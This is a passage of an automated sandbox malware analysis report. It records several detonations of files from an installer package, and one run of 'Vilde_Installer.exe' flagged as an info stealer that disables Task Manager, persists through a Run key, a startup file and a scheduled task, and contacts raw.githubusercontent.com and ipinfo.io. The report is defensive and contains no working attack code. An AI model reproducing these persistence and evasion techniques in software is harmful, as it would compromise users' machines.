
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 220

Network

N/A

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:18

Platform

win7-20240611-en

Max time kernel

121s

Max time network

128s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\pl.pak

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\pak_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\pak_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\pak_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\pak_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\pak_auto_file C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\.pak C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\.pak\ = "pak_auto_file" C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\pl.pak

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\locales\pl.pak

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\locales\pl.pak"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 ffce091b7bfe7f0b83e542c1cb995010
SHA1 c934568009c8aff2916fb7c7955831428d1b6f96
SHA256 677cfe4be64b1df02458ce28b36a7e1dee488212581e8792857db00640da51fc
SHA512 439e2fc709afec74abc57d7d1916256b6eb563e7439719df39fb87ebafa500063048d52cfbd5d7ddb24795df1817fc70066b29571b6981ba01a84ad49a1cb7fd

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:18

Platform

win10v2004-20240508-en

Max time kernel

140s

Max time network

163s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\pl.pak

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\pl.pak

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:18

Platform

win7-20240220-en

Max time kernel

120s

Max time network

129s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\ro.pak

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pak_auto_file\ C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.pak\ = "pak_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.pak C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pak_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pak_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pak_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pak_auto_file C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\ro.pak

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\locales\ro.pak

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\locales\ro.pak"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 423a41964c7d2f46d8f4053e51b77f38
SHA1 4c01567eeb729109d5b46add8e10ca4e1de6a5bb
SHA256 47f4b4bfaa44ad3f2eb7f027915caed4c6b973689b802ad72798c13aa363191a
SHA512 dc75aad8c806bcc43314d6f66c8d7b30791c79866e4d4db73336924acbca42ba38ced682b9884fffd46d15e4b356ec1d490d86aa864a21765f325e9a3e3947d4

Analysis: behavioral18

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:19

Platform

win10v2004-20240508-en

Max time kernel

59s

Max time network

55s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\ru.pak

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\ru.pak

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:19

Platform

win7-20240611-en

Max time kernel

120s

Max time network

137s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sk.pak

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\pak_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\.pak C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\.pak\ = "pak_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\pak_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\pak_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\pak_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\pak_auto_file C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sk.pak

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\locales\sk.pak

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\locales\sk.pak"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 5036b5da3393fc13541608ec12fc78b8
SHA1 2eef0cb104a61d476f81de085f1dcb5c322681aa
SHA256 e84f1f8e0b8ccd89f1a13de00ffc798591cfac34592f036d75abfa9122627c4f
SHA512 58dd7bd5e80498ea93f092a89b7ab83b2af9a2b0e9031b5f30c90e981629a6043d67225321ceb032de137ea56b6fb431876bf8d572ca290b917f8ea8c4ba77b7

Analysis: behavioral32

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:19

Platform

win10v2004-20240508-en

Max time kernel

48s

Max time network

59s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\te.pak

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\te.pak

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:18

Platform

win10v2004-20240611-en

Max time kernel

59s

Max time network

133s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Vilde_Installer.exe"

Signatures

Disables Task Manager via registry modification

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDriverSetup79mlt7 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\Vilde_Installer.exe" C:\Windows\system32\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Vilde_Installer.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
